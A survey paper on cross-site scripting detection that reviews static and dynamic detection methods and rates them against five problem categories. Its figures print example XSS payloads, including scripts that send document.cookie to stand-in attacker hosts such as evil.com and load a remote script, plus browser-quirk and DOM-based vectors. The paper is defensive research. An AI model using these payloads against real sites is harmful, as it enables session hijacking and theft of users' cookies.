# Consideration Points: Detecting Cross-Site Scripting

Suman Saha
Dept. of Computer Science and Engineering
Hanyang University
Ansan, South Korea
sumsaha@gmail.com

*Abstract*—Web application (WA) expands its usages to provide more and more services and it has become one of the most essential communication channels between service providers and the users. To augment the users' experience many web applications are using client side scripting languages such as JavaScript but this growing of JavaScript is increasing serious security vulnerabilities in web application too, such as cross-site scripting (XSS). In this paper, I survey all the techniques those have been used to detect XSS and arrange a number of analyses to evaluate performances of those methodologies. This paper points major difficulties to detect XSS. I don't implement any solution of this vulnerability problem because; my focus is for reviewing this issue. But, I believe that this assessment will be cooperative for further research on this concern as this treatise figure out everything on this transcendent security problem.

## I. INTRODUCTION

In this modern world, web application (WA) expands its usages to provide more and more services and it has become one of the most essential communication channels between service providers and the users. To augment the users' experience many web applications are using client side scripting languages such as JavaScript but this growing of JavaScript is increasing serious security vulnerabilities in web application too. The topmost threat among those vulnerabilities is Cross-site scripting (XSS). The 21.5% among newly reported vulnerabilities were XSS, making it the most frequently reported security threat in 2006 [29, 30].

A class of scripting code is injected into dynamically generated pages of trusted sites for transferring sensitive data to any third party (i.e., the attacker's server) and avoiding same-origin-policy or cookie protection mechanism in order to allow attackers to access confidential data. XSS usually affects victim's web browser on the client-side where as SQL injection, related web vulnerability is involved with server-side. So, it is thorny for an operator of web application to trace the XSS holes. Moreover, no particular application knowledge or knack is required for any attacker to reveal the exploits. Additionally, several factors figure out in Wassermann and Su's paper those contribute to the prevalence of XSS vulnerabilities [29]. First, the system requirements for XSS are minimal. Second, most web application programming languages provide an unsafe default for passing untrusted input to the client. Finally, proper validation for untrusted input is difficult to get right, primarily because of the many, often browse-specific, ways of invoking the JavaScript interpreter. Therefore, we may say, inadequate validation of user's input is the key reason for Cross-site scripting (XSS) and effective input validation approach can be introduced to detect XSS vulnerabilities in a WA. But it's not always true. I found a number of situations during my survey, only input validation is not satisfactory to prevent XSS. Several techniques have been developed to detect this injection problem. Some of those are dynamically and some of those are statically handled. Every researcher tried to present more competent and effectual methodology than previous work. But in my point of view, every method has pros and cons.

The rest of this paper is structured as follows. In Section II, this paper presents nuts and bolts of this area and tries to picture out why cross-site scripting is more tricky and uncanny than other injection problems. I review several research papers, journals, related websites, and more than thousand XSS vectors and summarize all of them under one frame in Section III. After reviewing of existing systems I found atleast one problem from each system and categorize major problems into five broad categories. The brief presentation of all those categories with some realistic examples is placed in section IV. Analyzing of well known ten methodologies those were used to detect cross-site scripting and figure out their real looks in regarding to my five problem categories in section V, and finally, Section VI concludes.

## II. XSS ATTACK TYPES

There are three distinct types of XSS attacks: *non-persistent*, *persistent*, and *DOM-based* [8].

*Non-persistent* cross-site scripting vulnerability is the most common type. The attack code is not persistently stored, but, instead, it is immediately reflected back to the user. For instance, consider a search form that includes the search query into the page with the results, but without filtering the query for scripting code. This vulnerability can be exploited, for example, by sending to the victim an email with a special crafted link pointing to the search form and containing a malicious JavaScript code. By tricking the victim into clicking this link, the search form is submitted with the JavaScript code as a query string and the attack script is immediately sent back to the victim, as part of the web page with the result. As another example, consider the case of user who accesses the popular *trusted.com* web site to perform sensitive operations (e.g., on-line banking). The web-based application on *trusted.com* uses a cookie to store sensitive session information in the user's browser. Note that, because of the same origin policy, this cookie is accessible only to JavaScript code downloaded from a *trusted.com* web server. However, the user may be also browsing a malicious web site, say *www.evil.com,* and could be tricked into clicking on the following link:

```
1  <a href = "http://www.trusted.com/
2    <SCRIPT>
3      document. location =
4        'http://www.evil.com/steal-cookie.php?'
5        +document.cookie;
6    </SCRIPT>">
7    Click here to collect price.
8  </a>
```

Figure 1.  JavaScript code in HTTP request

When the user clicks on the link, an HTTP request is sent by the user's browser to the *www.trusted.com* web server, requesting the page:

```
1  <SCRIPT>
2    document. location =
3      'http://www.evil.com/steal-cookie.php?'
4      +document.cookie;
5  </SCRIPT>">
```

Figure 2.  JavaScript code, treating as requested link

The *trusted.com* web server receives the request and checks if it has the resource that is being requested. When the *trusted.com* host does not find the requested page, it will return an error page message. The web server may also decide to include the requested file name (which is actually script) will be sent from the *trusted.com* web server to the user's browser and will be executed in the context of the *trusted.com* origin. When the script is executed, the cookie set by *trusted.com* will be sent to the malicious web site as a parameter to the invocation of the steal-cookie.php server-side script. The cookie will be saved and can be used by the owner of the *evel.com* site to impersonate the unsuspecting user with respect to *trusted.com*.

*Persistent* type stores malicious code persistently in a resource (in a database, file system, or other location) managed by the server and later displayed to users without being encoded using HTML entities. For instance, consider an online message board, where users can post messages and others can access them later. Let us assume further that the application does not remove script contents from posted messages. In this case, the attacker can craft a message similar to the next example.

This message contains the malicious JavaScript code that the online message board stores in its database. A visiting user who reads the message retrieves the scripting code as part of the message. The user's browser then executes the script, which, in turn sends the user's sensitive information from his site to the attacker's site.

Yahoooo! You Won Prize. Click on *HERE* to verify.

```
1  <SCRIPT>
2    document. images[0].src =
3      http://evil.com/images.jpg?stolencookie +
4      document.cookie;
5  </SCRIPT>
```

Figure 3.  Persistent XSS vector

*DOM-based* cross-site scripting attacks are performed by modifying the DOM "environment" in the client side instead of sending any malicious code to server. So the server doesn't get any scope to verify the payload. The following example shows that a sign (#) means everything following it is fragment, i.e. not part of the query.

```
1  http://www.evil.com/Home.html#name=
2    <SCRIPT>alert('XSS')</SCRIPT>
```

Figure 4.  DOM-based XSS vector

Browser doesn't send fragment to server, and therefore server would only see the equivalent of http://www.evil.com/Home.html, not the infected part of the payload. We see, therefore, that this evasion technique causes the major browsers not to send the malicious payload to the server. As a consequence, even the well-planned XSS filters become impotent against such attacks.

As Grossman, RSNAKE, PDP, Rager, and Fogie point out, cross-site scripting is a variegated problem that is not easy to solve anytime soon [14]. There is no quick fix that is acceptable for the majority like other security related issues. They figure out the problem as two-fold. First, the browsers are not secure by design. They are simply created to produce outputs with respect to requests. It is not the main duty of any browser to determine whether or not the piece of code is doing something malicious. Second, web application developers are unable to create secure sites because of programming knacks lacking or time margins. As a consequence, attackers get chances to exploit the applications' vulnerabilities. Hence, now, the users are stuck between two impossible states.

III. EXISTING METHODS

*A. Dynamic Approach*

*1) Vulnerability Analysis based Approach:*

   *a) Interpreter-based Approaches:* Pietraszek, and Berghe use approach of instrumenting interpreter to track untrusted data at the character level and to identify vulnerabilities they use context-sensitive string evaluation at each susceptible sink [18]. This approach is sound and can detect vulnerabilities as they add security assurance by modifying the interpreter. But approach of modifying interpreter is not easily applicable to some other web programming languages, such as Java (i.e., JSP and servlets) [2].

   *b)* Syntactical Structure Analysis: A successful inject attack changes the syntactical structure of the exploited entity,

stated by Su, and Wassermann in [2] and they present an approach to check the syntactic structure of output string to detect malicious payload. Augment the user input with meta-data to track this sub-string from source to sinks. This meta-data help the modified parser to check the syntactical structure of the dynamically generated string by indicating end and start position of the user given data. If there is any abnormality then it blocks further process. These processes are quite success while it detect any injection vulnerabilities other than XSS. Only checking the syntactic structure is not sufficient to prevent this sort of workflow vulnerabilities that are caused by the interaction of multiple modules [25].

*2) Attack Prevention Approach:*

*a) Proxy-based Solution:* Noxes, a web proxy protects against transferring of sensitive information from victim's site to third party's site [13]. This is an application-level firewall to block and detect malware. User is provided with fine-grained control over each and every connection which are coming to or leaving from local machine. If any connection is mismatched with the firewall's rules then firewall prompts the user to decide whether the connection needs to be blocked or allowed. Almost similar approaches apply in [12], [24], and [27]. Blacklisting the link is not sufficient technique to prevent cross-site Scripting attacks, e.g., those don't go against same origin policy, as was the case of the Samy worm [10]. Huang et al. state, proxy-based solution doesn't present any procedure to identify the errors and it needs watchful configuration [6]. These sorts of systems protect the unpredictable link without examining the fault which may increase the false positive [28].

*b) Browser-Enforced Embedded Policies:* A white list of all benign scripts is given by the web application to browser to protect from malicious code [10]. This smart idea allows only listed scripts to run. There is no similarity between different browsers' parsing mechanism and as a consequence, successful filtering system of one browser may unsuccessful for another. So, the method of this paper is quite successful against this situation but enforcing the policy to browser requires a modification in that. So, it suffers for scalability problem from the web application's point of view [11]. Every client need to have this modification version of the browser.

*B. Static Analysis*

*1) Taint Propagation Analysis:* Lots of static and dynamic approaches use taint propagation analysis using data flow analysis to track the information flow from source to sink [4, 6, 9, 22, and 26]. The underlying assumption of this technique is as follows: if a sanitization operation is done on all paths from source to sinks then the application is secure [19]. Keeping faith on user's filter and not checking the sanitization function at all is not a good idea at all because some XSS vectors can bypass many strong filters easily. Thus it doesn't provide strong security mechanism [2].

*2) String Analysis:* The study of string analysis grew out of the study of text processing programs. XDuce, a language designed for XML transformations uses formal language (e.g., regular languages) [31]. Christensen, Møller, and Schwartzbach introduced the study of static string analysis for imperative (and real world) languages by showing the usefulness of string analysis for analyzing reflective code in Java programs and checking for errors in dynamically generated SQL queries [7]. They designed an analysis for Java using finite state automata (FSA) as its target language representation. They also applied techniques from computational linguistics to generate good FSA approximation of CFGs [32]. Their analysis, however, does not track the source of data, and because it must determine the FSA between each operation, it is less efficient that other string analyzes and not practical for finding XSS vulnerabilities [29]. Minamide followed same technique to design a string analysis for PHP that does not approximate CFGs to FSA. His proposed technique that checks the whole document for the presence of the "<script>" tag. Because web applications often include their own scripts, and because many other ways of invoking the JavaScript interpreter exist, the approach is not practical for finding XSS vulnerabilities.

*3) Preventing XSS Using Untrusted Scripts:* Using a list of untrusted scripts to detect harmful script from user given data is well- known technique. Wassermann and Su's recent work [29] is a shadow of this process. They build policies and generate regular expressions of untrusted tags to check whether it has non-empty intersection between generated regular expression and CFG, generate from String taint static analysis, if so, they take further action. We believe that using any list of untrusted script is easy and poor idea. Same opinion is stated in the document of OWASP [17]. In the document, it was mentioned, "Do not use "blacklist" validation to detect XSS in input or to encode output. Searching for and replacing just a few characters ("<" ">" and other similar characters or phrases such as "script") us weak and has been attacked successfully. XSS has a surprising number of variants that make it easy to bypass blacklist validation."

*4) Software Testing Techniques:* Y. Huang, S. Huang, Lin, and Tsai use number of software-testing techniques such as black-box testing, fault injection, and behavior monitoring to web application in order to deduce the presence of vulnerabilities [15]. It's a combination of user-behavior simulation with user experience modeling as black-box testing [28]. Similar approaches are used in several commercial projects such as *APPScan* [21], *WebInspect*[20], and *ScanDo* [23]. Since, these approaches are applied to identify errors in development cycle, so these may unable to provide instant Web application protection [6] and they cannot guarantee the detection of all flaws as well [27].

*5) Bounded Model Checking:* Huang et al. use counterexample traces to reduce the number of inserted sanitization routines and to identify the cause of errors that increase the precision of both error reports and code instrumentation [28]. To verify legal information flow within the web application programs, they assign states those represent variables' current trust level. Then, Bounded Model Checking technique is used to verify the correctness of all possible safety states of the Abstract Interpretation of the program. In their method, they leave out alias analysis or include file resolution issues those are some of major problems in most of the current systems [26].

*C. Static and Dynamic Analysis Combination*

*1) Lattice-based Analysis:* The WebSSARI is a tool, combination of static and runtime features that apply static taint propagation analysis to find security vulnerabilities [6]. On the basis of lattice model and typestate this tool uses flow sensitive, intra-procedural analysis to detect vulnerability. This tool automatically inserts runtime guards, i.e., sanitization routines when it determines that tainted data reaches sensitive functions [25]. The major problems of this method are that it provides large number of false positive and negative due to its intraprocedural type-based analysis [4]. Moreover, this method considers the results from users' designed filters are safe. Therefore, it may miss real vulnerabilities. Because, it may be possible that designated filtering function is not able to detect the malicious payload.

IV. CONSIDERATION POINTS TO DETECT XSS

After close examination of existing detectors, I found at least one problem from each detector. Those problems are categorized into five categories. A brief description of these categories along with some realistic examples is placed in this section.

*A. Insecure JavaScript Practice*

Yue et al. characterize the insecure engineering practice of JavaScript *inclusion* and *dynamic generation* at different websites by examining severity and nature of security vulnerabilities [3]. These two insecure practices are the main reasons for injecting malicious code into websites and creating XSS vectors. According to their survey results, 66.4% of measured websites has insecure practice of JavaScript inclusion using *src* attribute of a script tag to include a JavaScript file from external domain into top-level domain document of a web page. Top-level document is document loaded from URL displayed in a web browser's address bar.

Two domain names are regarded as different only if, after discarding their top-level domain names (e.g., .com) and the leading name "www" (if existing); they don't have any common sub-domain name. For instance, two domain name are regarded as different only if the intersection of the two sets *{ d1sub2.d1sub1}* and *{ d2sub3.d2sub2.d2sub1}* is empty [3].

1. www.d1sub2.d1sub1.d1tld
2. d2sub3.d2sub2.d2sub1.d2tld

79.9% of measured websites uses one or more types of JavaScript dynamic generation techniques. In case of dynamic generation techniques, document.write(), innerHTML, eval() functions are more popular than some other secure methods. Their results show 94.9% of the measured website register various kinds of event handlers in their webpage. Dynamically generated Script (DJS) instance is identified in different ways for different generation techniques. For the eval() function, the whole evaluated string content is regarded as a DJS instance. Within the written content of the document.write() method and the value of the innerHTML property, a DJS instance can be identified by from three source [3].

- Between a pair of <SCRIPT> and </SCRIPT> tags
- In an event handler specified as the value of an HTML attribute such as onclick or onmouseover;
- In a URL using the special javascript:protocol specifier.

I investigated more than 100 home pages of unique websites manually (reading source file) to make a small measurement. My measurement results almost reflect their outcome.

TABLE I. INSECURE JAVASCRIPT PRESENCE IN HTML FILES

| No of HTML files | JS | DJS | | |
|---|---|---|---|---|
| | | *eval* | *document.write* | *innerHTML* |
| 106 | 83 | 19 | 92 | 7 |

To eliminate this risk, developers have to avoid insecure practice of JavaScript, such as they need to avoid external JavaScript inclusion using internal JavaScript files, eval() function need to be replaced with some other safe function [3].

*B. Malicious code between Static Scripts*

User input between any existing scripting codes is vital issue while detecting XSS. It's really hard to find any method from existing systems that can solve this dilemma appropriately. There are two types of scripting code in any webpage. Some of them are static and some of them are dynamic (composed during runtime). Let's begin the discus on this issue with one example.

| 1 | <SCRIPT> var a = $ENV_STRING; </SCRIPT> |

Figure 5. User given data between static script code

In the above example, both starting both starting and ending tag of *script* are static and the user input is sandwiched between them that make the scripting code executable. But problem is that any successful injection in this context may create XSS vector. All strong filters of the existing systems try to find malicious code from the user input. This kind of situation in static code may help attackers to circumvent any detecting filter. For instance, the Samy MySpace Wormintroduced keywords prohibited by the filters (*innerHTML*) through JavaScript code that resulted the output as the client end *(eval('inner'+'HTML'))* [10]. On the other hand we cannot eliminate any static scripting code while filtering because they are legitimate and there may be a safe user input between those legitimate codes. So it is hard to isolate and filter input that builds such construct without understanding the syntactical context in which they used [11]. So meaning of the syntax is a vital concern while filtering.

## C. Browser-specific Problems

The diversity of browser characteristics is one of the major problems while detecting vulnerabilities. Different browser parses web page differently. Some of them follow the rules of W3C and some of them it's own. So, this multifaced of browsers makes many filters weak. Moreover, browser cannot distinguish between crafted scripts with malicious inputs and benign scripts. They are always ready to execute all scripts which is a cause of XSS attacks. For instance, some browser accept newline or white space in "*JavaScript*", portion of a *JavaScript:URL*, some don't.

```
1  <img src = 'Java
2              Script:alert(1)'>
```

Figure 6.  Newline between JavaScript

This will result in script execution for some browsers. Vector rely on the "ad-hoc(quirk)" behavior of the Firefox HTML parser e.g., only the Firefox executes –

```
1  <SCRIPT/XSS
2      SRC = http://evil/e.js></SCRIPT>
```

Figure 7.  SCRIPT followed by non-character

Let's look another case,

```
1  preg_replace("/\<SCRIPT (.*?)\.(.*?)\
2                <\/SCRIPT(.*?)\>/i", "SCRIPT
3                BLOCKED", $VALUE);
```

Figure 8.  Detect closing SCRIPT tag

The above function *preg_replace* looks for a closing script tag. Some browsers do not allow any scripting code without any closing script tag. But it's not true for all. Most of the browsers accept scripting code without closing tag and automatically insert the missing tag [19]. This generosity of the browser helps any attacker to insert malicious code easily. So, Proper validation for malicious payload is difficult to get right. The nature of different browser's parsing mechanisms must be a vital concern while developing any tool for detecting untrusted user input. Some of existing systems tried to overcome this problem but I think that those are not perfect for all browsers.

## D. DOM-based Problems

One of the crucial problems of most existing systems is they cannot detect *DOM-based* XSS. So only identifying *stored* and *reflected* XSS is not sufficient for preventing all of XSS domain and according to Amit Klein's article, *DOM-based* is one of the upcoming injection problems in web world because nowadays, most of the issues related to other type of XSS problems are being cleaned up on major websites [16]. So, bad guys will try for third type of XSS vulnerability. We already know, *DOM-based* XSS vector does not need to appear on the server and it's not easy for a server to identify. So, attackers get extra advantage with this type of XSS vulnerability. *DOM-based* XSS is introduced by Amit Klein in his article [16] and this type XSS can be hidden in the JavaScript code and many strong web application firewalls fail to filter this malicious code.

In the eXtensible Markup Language (XML) world, there are mainly two types of parser, DOM and SAX. DOM-based parsers load the entire document as an object structure, which contains methods and variables to easily move around the document and modify nodes, values, and attributes on the fly. Browsers work with DOM. When a page is loaded, the browser parses the resulting page into an object structure. The *getElementByTagName* is a standard DOM function that is used to locate XML/HTML nodes based on their tag name.

Let's start to discuss about on this topic deeply with Amit Klein given example. Say, the content of http://www.vulnerable.site/welcome.html as follows:

```
1   <HTML>
2   <TITLE> Welcome! </TITLE>
3   <SCRIPT>
4     var pos =
5       document.URL.indexof("name=")+5
6       document.write(document.URL.substring
7       (pos, document.URL.length));
8   </SCRIPT>
9   <BR>
10    Welcome to our System
11  </HTML>
```

Figure 9.  HTML page

If we analyze the code of the example, we will see that developer has forgotten to sanitize the value of the "name" get parameter, which is subsequently written inside the document as soon as it is retrieved. The result of this HTML page will be http://vulnerable.site/welcome.html?name= Joe (if user input is 'Joe'). However, if the user input is any scripting code that would result in an XSS situation. e.g.;

```
1   http://vulnerable.site/welcome.html?name=
2     <SCRIPT> alert(document.cookie)
3     </SCRIPT>
```

Figure 10.  DOM-based XSS vector

Many people may disagree with this statement and may argue that still, the malicious code is sending to the server, and any filter can be used in the server to identify it. Let's see an update version of previous example.

```
1   http://vulnerable.site/welcome.html#name=
2     <SCRIPT> alert(document.cookie)
3     </SCRIPT>
```

Figure 11. DOM-based XSS vector with (#) sign

Here sign (#) right after the file name used as fragment starter and anything beyond this is not a part of query. Most of the well-known browsers do not send the fragment to server. So actual malicious part of the code is not appeared to the server, and therefore, the server would see the equivalent of *http://www.vulnerable.site/welcome.html*. More scenarios on *DOM-based* XSS are in Amit Klein's article [16]. He suggests that minimizing insecure JavaScript practice in code may reduce the chances of *DOM-based* XSS. Web developer must be very careful when relying on local variables for data and control and should give attention on the scenarios wherein DOM is modified with the user input.

Automated testing has only very limited success at identifying and validating DOM based XSS as it usually identifies XSS by sending a specific payload and attempts to observe it in the server response. This may work fine for Fig. 9 if we exclude the idea of (#) sign but may not work in the following contrived case:

```
1   <SCRIPT>
2     var navAgt = navigator.userAgent;
3     if (navAgt.indexOf("MSIE")!=-1)
4     {
5         document.write("You are using IE and visiting
6                 site" +document.location.href+".");
7     }
8     else
9     {
10        document.write("You are using an unknown
11                browser.");
12    }
13  </SCRIPT>
```

Figure 12. DOM-based XSS vector

For this reason, automated testing will not detect areas that may be susceptible to DOM based XSS unless the testing tool can perform addition analysis of the client side code [34]. Manual testing should therefore be undertaken and can be done by examining areas in the code where parameter are referred to that may be useful to attackers. Examples of such areas include places where code is dynamically written to the page and elsewhere where the DOM is modified or even where scripts are directly executed.

*E. Multi-Module Problems*

The vulnerability of a server page is necessary condition for the vulnerability of web application, but it isn't a necessary condition [1]. That means protecting any single page from a malicious code never guarantees the protection of entire web application. Server page may send user data to other page or to any other persistent data store instead of client browser. In these situations, XSS may occur through another page. Most of the existing systems don't provide any procedure to handle this difficulty. In the multi-module scenario, data may be passed from one module to another module using some session variables and those session variables status are stored in cookies. Let's see the above example. This below example is taken from [25].

In the above example, Fig. 13, we can see user input is stored into session variable and later it is stored into $name variable. In Fig. 14, that session variable is echoed through different page. So, any filtering process on $name variable will not effect to session variable. In this case, any malicious code can create XSS vector using session variable and can bypass any filtering process. Bisht, Venkatakrishnan and Balzarotti, Cova, Felmetsger, Vigna solved Multi-module problem in their work [11, 25] but most of other tools are not having any technique to handle it.

```
1   <HTML>
2   <HEAD>
3    <TITLE> Enter User Name: </TITLE>
4   </HEAD>
5   <BODY>
6   <? php
7    // connect to the existing session
8    session_start();
9    // create a session variable
10   session_register("ses_var");
11   // set ses_var with php variable
12   $HTTP_SESSION_VARS["ses_var"] = $name
13   if (isset($_POST["user"])){
14     $name = addslashes($_POST["user"]);
15     exit;
16   }
17  ?>
18  <FORM action = "create.php" method = "POST">
19        UserName :
20        <input name = "user" type = "text">
21        <input name = "OK" type = "submit">
22  </FORM>
23  </BODY>
24  </HTML>
```

Figure 13. Session variable problem- 1$^{st}$ page

```
1   <?php
2        echo $_SESSION ["ses_var"];
3   <?
```

Figure 14. Session variable problem-2$^{nd}$ page

After reading source code files of LogiCampus Educational Platform [33], an open source web application to look out the mentioned XSS holes, I found several holes. Number of different kinds of holes is given in Table II. For finding DOM-based XSS holes it was needed to look DOM modification code or code that is used to write on the client side web page. Any pattern using user defined data dynamically such as any eventhandler or inline scripting code is tracked to analyze static script code problem. Multi-module problem is mainly occurred by session variable. So, I follow data flow using session variables and this application used several session variables but before showing any user defined data to the client site this application use filtering functions. So, none of those session variables will create any multi-module problem for this application.

TABLE II.     XSS HOLES IN A PARTICULAR WEB APPLICATION

| Application Name | PHP files | HTML files | DOM - based | Static Script | Multi - Module |
|---|---|---|---|---|---|
| LogiCampus Educational Platform | 186 | 543 | 7 | 12 | 0 |

## V. EVALUATION

Well known ten methodologies which were used to detect cross-site scripting and figure out their real looks with respect to my five problem categories is analyzed in this section. Table III describes the capability of well-known tools to solve the problems which I have mentioned in my previous section.

The results of this analysis are made using my knowledge which is acquired during my survey and some of them are made on the basis of following papers' comments on those tools. The first column states the authors or researchers of existing tools. If any tool has *Low* status under any problem then it is unable to solve this problem. On the other hand if any tool has *High* status under any problem then that tool is able to resolve the problem and in the case of *Medium*, tool may solve some part of that problem. For instance, the method of Jim, Swamy, and Hicks [10] has *Low* status under Multi-module problem which states that the tool is not capable to solve multi-module problem. Table IV figures out the false positive rate of those tools and these results are made on the basis of their results and comments. Some results are made using following papers' comments on those tools. We can see in the Table IV some results carry *Not Identified* that means, I couldn't summarize them. We can see in Table III, the method of Kirda, Kruegel, Vigna, and Jovanovic [13] has *High* status under all problems and it seems that it has capability to resolve all problems. But in Table IV we can find their method has *High* status that states this tool generates more false positive which is a massive disadvantage of any tool. Another stated problem in previous section, "*Insecure Practice of JavaScript*" is not included because we know *DOM-based*, and *malicious code between static scripts* are results of Insecure JavaScript practice. This is true; I don't do any analysis using their tools practically because I don't have. But I use their algorithms and procedures to make it possible. And I believe that this is sufficient to provide real picture.

## VI. CONCLUSION

This is my analysis report on most well-known injection problem, cross-site scripting. I didn't implement or run any tools to experiment. I use their algorithms and procedures to understand, how they work and I summarize their successes as well as limitations. I didn't find any method that is 100% perfect. Even I am not presenting any tool that can detect XSS. I keep this task for my future movement. Web Application performs many critical tasks and deals with sensitive information. In our daily life, we pass our so many confidential data through this media. So this platform must be secure and stable. Nowadays, web application facing security problem for these injection problem and XSS is one of them. Researchers are doing hard work to make our web application platform more reliable. This survey report will help them for their further research on this issue. I believe that this report provides summary of all the methodologies, used for detecting XSS and their limitations and success as well.

TABLE III. EXISTING METHODS' CAPABILITY TO RESOLVE PROBLEMS

| Authors | Browser specific | DOM - based | Static Script | Multi - Module |
|---|---|---|---|---|
| Su, and Wassermann [2] | Low | Low | Low | Low |
| Minamide [5] | Low | Low | Low | Low |
| Huang, Hang, Yu, Tsai, and Lee [6] | Low | Low | Low | Low |
| Jim, Swamy, and Hicks [10] | High | High | High | Low |
| Jovanovic, Kruegel, and Kirda [12] | Low | Low | Low | Low |
| Kirda, Kruegel, Vigna, and Jovanovic [13] | High | High | High | High |
| Y. Huang, S. Huang, Lin, and Tsai [15] | Low | Low | Low | Low |
| Pietraszek, and Berghe [18] | High | Low | High | Low |
| Huang, Hang, Tsai, Lee, and Kuo [28] | Low | Low | Low | Low |
| Wassermann, and Su [29] | Medium | Low | Low | Low |

TABLE IV. FALSE POSITIVE RATE OF EXISTING METHODS

| Authors | False positive |
|---|---|
| Su, and Wassermann [2] | Low |
| Minamide [5] | Medium |
| Huang, Hang, Yu, Tsai, and Lee [6] | High |
| Jim, Swamy, and Hicks [10] | Low |
| Jovanovic, Kruegel, and Kirda [12] | Medium |
| Kirda, Kruegel, Vigna, and Jovanovic [13] | High |
| Y. Huang, S. Huang, Lin, and Tsai [15] | Not Identified |
| Pietraszek, and Berghe [18] | Medium |
| Huang, Hang, Tsai, Lee, and Kuo [28] | Not Identified |
| Wassermann, and Su [29] | Medium |